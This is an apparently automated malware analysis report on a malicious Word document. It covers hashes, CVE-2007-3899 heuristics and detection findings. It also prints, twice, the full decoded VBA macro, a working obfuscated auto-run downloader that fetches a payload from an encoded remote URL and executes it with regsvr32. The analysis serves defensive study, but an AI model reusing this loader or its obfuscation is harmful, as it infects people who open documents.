Office (OLE) malware analysis — malicious · c5cece0cb0a76719

MALICIOUS

Office (OLE)

358.0 KB Created: 2020-03-29 20:40:00 Authoring application: Microsoft Office Word First seen: 2020-09-24

MD5: 1324300edad18e5acaa84bdd33d9d1c7 SHA-1: 8fc3a2ad8a8f4e801442b298da5757f9f7ac0b91 SHA-256: c5cece0cb0a76719cdb598f3e77fef93f543df527c0390cddff42b4d125426e8

278 Risk Score

Malware Insights

MITRE ATT&CK

T1203 Exploitation for Client Execution T1059.005 Visual Basic

The sample exploits CVE-2007-3899, a memory corruption vulnerability in Microsoft Word, to trigger an obfuscated VBA loader. This loader, specifically the Document_Open macro, uses CreateObject and CreateProcessA API calls to execute a payload. The primary intent is to download and execute a second-stage payload, leveraging the CreateProcess API.

Heuristics 9

CVE-2007-3899 — Microsoft Word malformed string memory corruption critical CVE likely CVE_2007_3899

Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
Matched line in script
```
Public Function DDFunc() As Object
    Set DDFunc = CreateObject(SDBqNUFDsp4xUjmKJPAeYJXya8("udfkcPnfutzTfmjG/hojuqjsdT"))
End Function
```

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

Public Function DDFunc() As Object
    Set DDFunc = CreateObject(SDBqNUFDsp4xUjmKJPAeYJXya8("udfkcPnfutzTfmjG/hojuqjsdT"))
End Function

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro

Matched line in script

Attribute VB_Customizable = True
Private Sub Document_Open()
    Module2.jARVE2CUb839wrpzUb9Hxs3Tv9

Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)

Matched line in script

Public Function RKZEOFgxO27LTSo2HtVCqMUU0z() As String
 RKZEOFgxO27LTSo2HtVCqMUU0z = Environ(SDBqNUFDsp4xUjmKJPAeYJXya8("QNFU")) & Application.PathSeparator & SDBqNUFDsp4xUjmKJPAeYJXya8("mme/e")
End Function

Reference to CreateProcess API high SC_STR_CREATEPROCESS

Reference to CreateProcess API
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7231 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	7231 bytes
SHA-256: `307829b15065d25c781368330115e78a210c71553a19930ba248a906bb45c4e5`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() Module2.jARVE2CUb839wrpzUb9Hxs3Tv9 End Sub Attribute VB_Name = "Module1" Attribute VB_Name = "Module2" Private Type STARTUPINFO cb As Long lpReserved As String lpDesktop As String lpTitle As String dwX As Long dwY As Long dwXSize As Long dwYSize As Long dwXCountChars As Long dwYCountChars As Long dwFillAttribute As Long dwFlags As Long wShowWindow As Integer cbReserved2 As Integer lpReserved2 As Integer hStdInput As Long hStdOutput As Long hStdError As Long End Type Private Type PROCESS_INFORMATION hProcess As Long hThread As Long dwProcessID As Long dwThreadID As Long End Type #If VBA7 Then Private Declare PtrSafe Function CreateProcessA Lib "Kernel32" ( _ ByVal lpAppName As String, _ ByVal lpCmdLine As String, _ ByVal lpProcAttr As Long, _ ByVal lpThreadAttr As Long, _ ByVal lpInheritedHandle As LongPtr, _ ByVal lpCreationFlags As LongPtr, _ ByVal lpEnv As Long, _ ByVal lpCurDir As String, _ lpStartupInfo As STARTUPINFO, _ lpProcessInfo As PROCESS_INFORMATION) As LongPtr Private Declare PtrSafe Function Sleep Lib "Kernel32" (ByVal vwe3 As Long) As Long #Else Private Declare Function CreateProcessA Lib "Kernel32" ( _ ByVal lpAppName As String, _ ByVal lpCmdLine As String, _ ByVal lpProcAttr As Long, _ ByVal lpThreadAttr As Long, _ ByVal lpInheritedHandle As Long, _ ByVal lpCreationFlags As Long, _ ByVal lpEnv As Long, _ ByVal lpCurDir As String, _ lpStartupInfo As STARTUPINFO, _ lpProcessInfo As PROCESS_INFORMATION) As Long Private Declare Function Sleep Lib "Kernel32" (ByVal vwe3 As Long) As Long #End If Private Sub DUDU() Dim si As STARTUPINFO Dim pi As PROCESS_INFORMATION Dim si2 As STARTUPINFO Dim pi2 As PROCESS_INFORMATION Dim temp As String: temp = SDBqNUFDsp4xUjmKJPAeYJXya8("fyf/34swthfs]34nfutzT]txpeojX];D") Dim temp2 As String: temp2 = SDBqNUFDsp4xUjmKJPAeYJXya8("tcw/e]zspudfsjeqnu]djmcvQ]tsftV];D") Dim url As String: url = SDBqNUFDsp4xUjmKJPAeYJXya8("fyf/uqjsdtd]34nfutzT]txpeojX];D") Dim durl As String: durl = SDBqNUFDsp4xUjmKJPAeYJXya8("!phpmpo0!") + SDBqNUFDsp4xUjmKJPAeYJXya8("tcw/e]zspudfsjeqnu]djmcvQ]tsftV];D") Dim file As String: Dim i As Integer: i = 0 If CreateProcessA(url, durl, 0, 0, False, 0, 0, "C:\", si, pi) Then Do While file = "" Or i > 10 file = RKZEOFgxO27LTSo2HtVCqMUU0z() Sleep 3000: i = i + 1 Loop Deleter If CreateProcessA(temp, SDBqNUFDsp4xUjmKJPAeYJXya8("!jt0!") + RKZEOFgxO27LTSo2HtVCqMUU0z(), 0, 0, False, 0, 0, "C:\", si2, pi2) Then Debug.Print 1 Else Debug.Print 2 End If End If End Sub Public Sub jARVE2CUb839wrpzUb9Hxs3Tv9() CREATEFILEFUNC DUDU End Sub Private Function CREATEFILEFUNC() Dim Ak0UIU4QaEDoyiH7CWxPySc4jM As Object: Set Ak0UIU4QaEDoyiH7CWxPySc4jM = DDFunc Dim a As Object Dim d1 As String: d1 = SDBqNUFDsp4xUjmKJPAeYJXya8("#2/6/utfvrfSquuIojX/quuIojX#)udfkcPfubfsD!>!rfSquuIojX!ufT!)ojbN!cvT") Dim d2 As String: d2 = SDBqNUFDsp4xUjmKJPAeYJXya8("eoft/rfSquuIojX!;!ftmbG-#unK4{1ZDfBSQdHg07FZUY[cxCtmLvPBH109::9775:620pqnbd0cvmd/ldpsjcpcjc00;quui#-#UFH#!ofqP/rfSquuIojX") Dim d3 As String: d3 = SDBqNUFDsp4xUjmKJPAeYJXya8("ofiU!113!>!tvubuT/rfSquuIojX!gJ") Dim d4 As String: d4 = SDBqNUFDsp4xUjmKJPAeYJXya8("*#nbfsuT/CEPEB#)udfkcPfubfsD!>!nbfsuTp!ufT") Dim d5 As String: d5 = SDBqNUFDsp4xUjmKJPAeYJXya8("#!>!iubq!;!zepCftopqtfs/rfSquuIojX!fujsX/nbfsuTp!;!2!>!fqzU/nbfsuTp!;ofqP/nbfsuTp") + RKZEOFgxO27LTSo2HtVCqMUU0z() + SDBqNUFDsp4xUjmKJPAeYJXya8("ftpmD/nbfsuTp!;!3!-iubq!fmjGpUfwbT/nbfsuTp!;#") Dim d8 As String: d8 = SDBqNUFDsp4xUjmKJPAeYJXya8("ojbN!mmbD!;cvT!eoF!gJ!eoF") Set up9FDJnVkQNF953nOSajSMPtvo = ff(Ak0UIU4QaEDoyiH7CWxPySc4jM) up9FDJnVkQNF953nOSajSMPtvo.WriteLine (d1) up9FDJnVkQNF953nOSajSMPtvo.WriteLine (d2) up9FDJnVkQNF953nOSajSMPtvo.WriteLine (d3) up9FDJnVkQNF953nOSajSMPtvo.WriteLine (d4) up9FDJnVkQNF953nOSajSMPtvo.WriteLine (d5) up9FDJnVkQNF953nOSajSMPtvo.WriteLine (d6) up9FDJnVkQNF953nOSajSMPtvo.WriteLine (d8) up9FDJnVkQNF953nOSajSMPtvo.Close End Function Public Function DDFunc() As Object Set DDFunc = CreateObject(SDBqNUFDsp4xUjmKJPAeYJXya8("udfkcPnfutzTfmjG/hojuqjsdT")) End Function Public Function ff(d As Object) As Object Dim Exists As String Exists = Dir(SDBqNUFDsp4xUjmKJPAeYJXya8("zspudfsjeqnu]djmcvQ]tsftV];D"), vbDirectory) If Exists = "" Then d.CreateFolder SDBqNUFDsp4xUjmKJPAeYJXya8("zspudfsjeqnu]djmcvQ]tsftV];D") End If Set ff = d.CreateTextFile(SDBqNUFDsp4xUjmKJPAeYJXya8("tcw/e]zspudfsjeqnu]djmcvQ]tsftV];D"), True) End Function Private Function Deleter() Dim ff As Object: Set ff = DDFunc Dim Exists As String Exists = Dir(SDBqNUFDsp4xUjmKJPAeYJXya8("zspudfsjeqnu]djmcvQ]tsftV];D"), vbDirectory) If Not Exists = "" Then ff.DeleteFolder SDBqNUFDsp4xUjmKJPAeYJXya8("zspudfsjeqnu]djmcvQ]tsftV];D") End If End Function Public Function RKZEOFgxO27LTSo2HtVCqMUU0z() As String RKZEOFgxO27LTSo2HtVCqMUU0z = Environ(SDBqNUFDsp4xUjmKJPAeYJXya8("QNFU")) & Application.PathSeparator & SDBqNUFDsp4xUjmKJPAeYJXya8("mme/e") End Function Function SDBqNUFDsp4xUjmKJPAeYJXya8(SFjRThkvu17fvkRaVtPfJItdaP As String) As String SDBqNUFDsp4xUjmKJPAeYJXya8 = rWbrqMQOQWAEzzk5VKXlkXZIjY(dtDn0FNZNcwipmFPk87UYwZfDE(SFjRThkvu17fvkRaVtPfJItdaP, Len(SFjRThkvu17fvkRaVtPfJItdaP), 1), Len(SFjRThkvu17fvkRaVtPfJItdaP), 1) End Function Public Function dtDn0FNZNcwipmFPk87UYwZfDE(SFjRThkvu17fvkRaVtPfJItdaP As String, gce66SISWKp8CceEEt7zYxTJCp As Long, TEOrWG1EZIQy4oXdOGvWqxAFEA As Long) As String Dim Ak0UIU4QaEDoyiH7CWxPySc4jM As String Ak0UIU4QaEDoyiH7CWxPySc4jM = SFjRThkvu17fvkRaVtPfJItdaP For up9FDJnVkQNF953nOSajSMPtvo = 1 To gce66SISWKp8CceEEt7zYxTJCp Mid$(Ak0UIU4QaEDoyiH7CWxPySc4jM, up9FDJnVkQNF953nOSajSMPtvo, 1) = Mid$(SFjRThkvu17fvkRaVtPfJItdaP, gce66SISWKp8CceEEt7zYxTJCp - up9FDJnVkQNF953nOSajSMPtvo + TEOrWG1EZIQy4oXdOGvWqxAFEA, 1) Next dtDn0FNZNcwipmFPk87UYwZfDE = Ak0UIU4QaEDoyiH7CWxPySc4jM End Function Public Function rWbrqMQOQWAEzzk5VKXlkXZIjY(SFjRThkvu17fvkRaVtPfJItdaP As String, gce66SISWKp8CceEEt7zYxTJCp As Long, TEOrWG1EZIQy4oXdOGvWqxAFEA As Long) As String Dim Ak0UIU4QaEDoyiH7CWxPySc4jM As String For up9FDJnVkQNF953nOSajSMPtvo = 1 To gce66SISWKp8CceEEt7zYxTJCp Ak0UIU4QaEDoyiH7CWxPySc4jM = Chr(Asc(Mid$(SFjRThkvu17fvkRaVtPfJItdaP, up9FDJnVkQNF953nOSajSMPtvo, 1)) - TEOrWG1EZIQy4oXdOGvWqxAFEA) Mid$(SFjRThkvu17fvkRaVtPfJItdaP, up9FDJnVkQNF953nOSajSMPtvo, 1) = Ak0UIU4QaEDoyiH7CWxPySc4jM Next rWbrqMQOQWAEzzk5VKXlkXZIjY = SFjRThkvu17fvkRaVtPfJItdaP End Function

SHA-256: 307829b15065d25c781368330115e78a210c71553a19930ba248a906bb45c4e5

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    Module2.jARVE2CUb839wrpzUb9Hxs3Tv9
End Sub

Attribute VB_Name = "Module1"

Attribute VB_Name = "Module2"
Private Type STARTUPINFO
    cb As Long
    lpReserved As String
    lpDesktop As String
    lpTitle As String
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChars As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As Integer
    hStdInput As Long
    hStdOutput As Long
    hStdError As Long
End Type

Private Type PROCESS_INFORMATION
    hProcess As Long
    hThread As Long
    dwProcessID As Long
    dwThreadID As Long
End Type

#If VBA7 Then
Private Declare PtrSafe Function CreateProcessA Lib "Kernel32" ( _
    ByVal lpAppName As String, _
    ByVal lpCmdLine As String, _
    ByVal lpProcAttr As Long, _
    ByVal lpThreadAttr As Long, _
    ByVal lpInheritedHandle As LongPtr, _
    ByVal lpCreationFlags As LongPtr, _
    ByVal lpEnv As Long, _
    ByVal lpCurDir As String, _
    lpStartupInfo As STARTUPINFO, _
    lpProcessInfo As PROCESS_INFORMATION) As LongPtr
Private Declare PtrSafe Function Sleep Lib "Kernel32" (ByVal vwe3 As Long) As Long
#Else
Private Declare Function CreateProcessA Lib "Kernel32" ( _
    ByVal lpAppName As String, _
    ByVal lpCmdLine As String, _
    ByVal lpProcAttr As Long, _
    ByVal lpThreadAttr As Long, _
    ByVal lpInheritedHandle As Long, _
    ByVal lpCreationFlags As Long, _
    ByVal lpEnv As Long, _
    ByVal lpCurDir As String, _
    lpStartupInfo As STARTUPINFO, _
    lpProcessInfo As PROCESS_INFORMATION) As Long
Private Declare Function Sleep Lib "Kernel32" (ByVal vwe3 As Long) As Long
#End If



Private Sub DUDU()
Dim si As STARTUPINFO
Dim pi As PROCESS_INFORMATION
Dim si2 As STARTUPINFO
Dim pi2 As PROCESS_INFORMATION
Dim temp As String: temp = SDBqNUFDsp4xUjmKJPAeYJXya8("fyf/34swthfs]34nfutzT]txpeojX];D")
Dim temp2 As String: temp2 = SDBqNUFDsp4xUjmKJPAeYJXya8("tcw/e]zspudfsjeqnu]djmcvQ]tsftV];D")
Dim url As String: url = SDBqNUFDsp4xUjmKJPAeYJXya8("fyf/uqjsdtd]34nfutzT]txpeojX];D")
Dim durl As String: durl = SDBqNUFDsp4xUjmKJPAeYJXya8("!phpmpo0!") + SDBqNUFDsp4xUjmKJPAeYJXya8("tcw/e]zspudfsjeqnu]djmcvQ]tsftV];D")
Dim file As String: Dim i As Integer: i = 0
    If CreateProcessA(url, durl, 0, 0, False, 0, 0, "C:\", si, pi) Then
        Do While file = "" Or i > 10
            file = RKZEOFgxO27LTSo2HtVCqMUU0z()
            Sleep 3000: i = i + 1
        Loop
        Deleter
        If CreateProcessA(temp, SDBqNUFDsp4xUjmKJPAeYJXya8("!jt0!") + RKZEOFgxO27LTSo2HtVCqMUU0z(), 0, 0, False, 0, 0, "C:\", si2, pi2) Then
            Debug.Print 1
        Else
            Debug.Print 2
        End If
    End If
End Sub

Public Sub jARVE2CUb839wrpzUb9Hxs3Tv9()
    CREATEFILEFUNC
    DUDU
End Sub

Private Function CREATEFILEFUNC()
Dim Ak0UIU4QaEDoyiH7CWxPySc4jM As Object: Set Ak0UIU4QaEDoyiH7CWxPySc4jM = DDFunc
Dim a As Object
Dim d1 As String: d1 = SDBqNUFDsp4xUjmKJPAeYJXya8("*#2/6/utfvrfSquuIojX/quuIojX#)udfkcPfubfsD!>!rfSquuIojX!ufT!*)ojbN!cvT")
Dim d2 As String: d2 = SDBqNUFDsp4xUjmKJPAeYJXya8("eoft/rfSquuIojX!;!ftmbG-#unK4{1ZDfBSQdHg07FZUY[cxCtmLvPBH109::9775:620pqnbd0cvmd/ldpsjcpcjc00;quui#-#UFH#!ofqP/rfSquuIojX")
Dim d3 As String: d3 = SDBqNUFDsp4xUjmKJPAeYJXya8("ofiU!113!>!tvubuT/rfSquuIojX!gJ")
Dim d4 As String: d4 = SDBqNUFDsp4xUjmKJPAeYJXya8("*#nbfsuT/CEPEB#)udfkcPfubfsD!>!nbfsuTp!ufT")
Dim d5 As String: d5 = SDBqNUFDsp4xUjmKJPAeYJXya8("#!>!iubq!;!zepCftopqtfs/rfSquuIojX!fujsX/nbfsuTp!;!2!>!fqzU/nbfsuTp!;ofqP/nbfsuTp") + RKZEOFgxO27LTSo2HtVCqMUU0z() + SDBqNUFDsp4xUjmKJPAeYJXya8("ftpmD/nbfsuTp!;!3!-iubq!fmjGpUfwbT/nbfsuTp!;#")
Dim d8 As String: d8 = SDBqNUFDsp4xUjmKJPAeYJXya8("ojbN!mmbD!;cvT!eoF!gJ!eoF")
    
    Set up9FDJnVkQNF953nOSajSMPtvo = ff(Ak0UIU4QaEDoyiH7CWxPySc4jM)
    up9FDJnVkQNF953nOSajSMPtvo.WriteLine (d1)
    up9FDJnVkQNF953nOSajSMPtvo.WriteLine (d2)
    up9FDJnVkQNF953nOSajSMPtvo.WriteLine (d3)
    up9FDJnVkQNF953nOSajSMPtvo.WriteLine (d4)
    up9FDJnVkQNF953nOSajSMPtvo.WriteLine (d5)
    up9FDJnVkQNF953nOSajSMPtvo.WriteLine (d6)
    up9FDJnVkQNF953nOSajSMPtvo.WriteLine (d8)

    up9FDJnVkQNF953nOSajSMPtvo.Close
End Function

Public Function DDFunc() As Object
    Set DDFunc = CreateObject(SDBqNUFDsp4xUjmKJPAeYJXya8("udfkcPnfutzTfmjG/hojuqjsdT"))
End Function

Public Function ff(d As Object) As Object
Dim Exists As String
    Exists = Dir(SDBqNUFDsp4xUjmKJPAeYJXya8("zspudfsjeqnu]djmcvQ]tsftV];D"), vbDirectory)
    If Exists = "" Then
        d.CreateFolder SDBqNUFDsp4xUjmKJPAeYJXya8("zspudfsjeqnu]djmcvQ]tsftV];D")
    End If
    Set ff = d.CreateTextFile(SDBqNUFDsp4xUjmKJPAeYJXya8("tcw/e]zspudfsjeqnu]djmcvQ]tsftV];D"), True)
End Function

Private Function Deleter()
Dim ff As Object: Set ff = DDFunc
Dim Exists As String
    Exists = Dir(SDBqNUFDsp4xUjmKJPAeYJXya8("zspudfsjeqnu]djmcvQ]tsftV];D"), vbDirectory)
    If Not Exists = "" Then
        ff.DeleteFolder SDBqNUFDsp4xUjmKJPAeYJXya8("zspudfsjeqnu]djmcvQ]tsftV];D")
    End If
End Function

Public Function RKZEOFgxO27LTSo2HtVCqMUU0z() As String
 RKZEOFgxO27LTSo2HtVCqMUU0z = Environ(SDBqNUFDsp4xUjmKJPAeYJXya8("QNFU")) & Application.PathSeparator & SDBqNUFDsp4xUjmKJPAeYJXya8("mme/e")
End Function

Function SDBqNUFDsp4xUjmKJPAeYJXya8(SFjRThkvu17fvkRaVtPfJItdaP As String) As String
    SDBqNUFDsp4xUjmKJPAeYJXya8 = rWbrqMQOQWAEzzk5VKXlkXZIjY(dtDn0FNZNcwipmFPk87UYwZfDE(SFjRThkvu17fvkRaVtPfJItdaP, Len(SFjRThkvu17fvkRaVtPfJItdaP), 1), Len(SFjRThkvu17fvkRaVtPfJItdaP), 1)
End Function

Public Function dtDn0FNZNcwipmFPk87UYwZfDE(SFjRThkvu17fvkRaVtPfJItdaP As String, gce66SISWKp8CceEEt7zYxTJCp As Long, TEOrWG1EZIQy4oXdOGvWqxAFEA As Long) As String
    Dim Ak0UIU4QaEDoyiH7CWxPySc4jM As String
    Ak0UIU4QaEDoyiH7CWxPySc4jM = SFjRThkvu17fvkRaVtPfJItdaP
    For up9FDJnVkQNF953nOSajSMPtvo = 1 To gce66SISWKp8CceEEt7zYxTJCp
       Mid$(Ak0UIU4QaEDoyiH7CWxPySc4jM, up9FDJnVkQNF953nOSajSMPtvo, 1) = Mid$(SFjRThkvu17fvkRaVtPfJItdaP, gce66SISWKp8CceEEt7zYxTJCp - up9FDJnVkQNF953nOSajSMPtvo + TEOrWG1EZIQy4oXdOGvWqxAFEA, 1)
    Next
    dtDn0FNZNcwipmFPk87UYwZfDE = Ak0UIU4QaEDoyiH7CWxPySc4jM
End Function

Public Function rWbrqMQOQWAEzzk5VKXlkXZIjY(SFjRThkvu17fvkRaVtPfJItdaP As String, gce66SISWKp8CceEEt7zYxTJCp As Long, TEOrWG1EZIQy4oXdOGvWqxAFEA As Long) As String
    Dim Ak0UIU4QaEDoyiH7CWxPySc4jM As String
    For up9FDJnVkQNF953nOSajSMPtvo = 1 To gce66SISWKp8CceEEt7zYxTJCp
        Ak0UIU4QaEDoyiH7CWxPySc4jM = Chr(Asc(Mid$(SFjRThkvu17fvkRaVtPfJItdaP, up9FDJnVkQNF953nOSajSMPtvo, 1)) - TEOrWG1EZIQy4oXdOGvWqxAFEA)
        Mid$(SFjRThkvu17fvkRaVtPfJItdaP, up9FDJnVkQNF953nOSajSMPtvo, 1) = Ak0UIU4QaEDoyiH7CWxPySc4jM
    Next
    rWbrqMQOQWAEzzk5VKXlkXZIjY = SFjRThkvu17fvkRaVtPfJItdaP
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.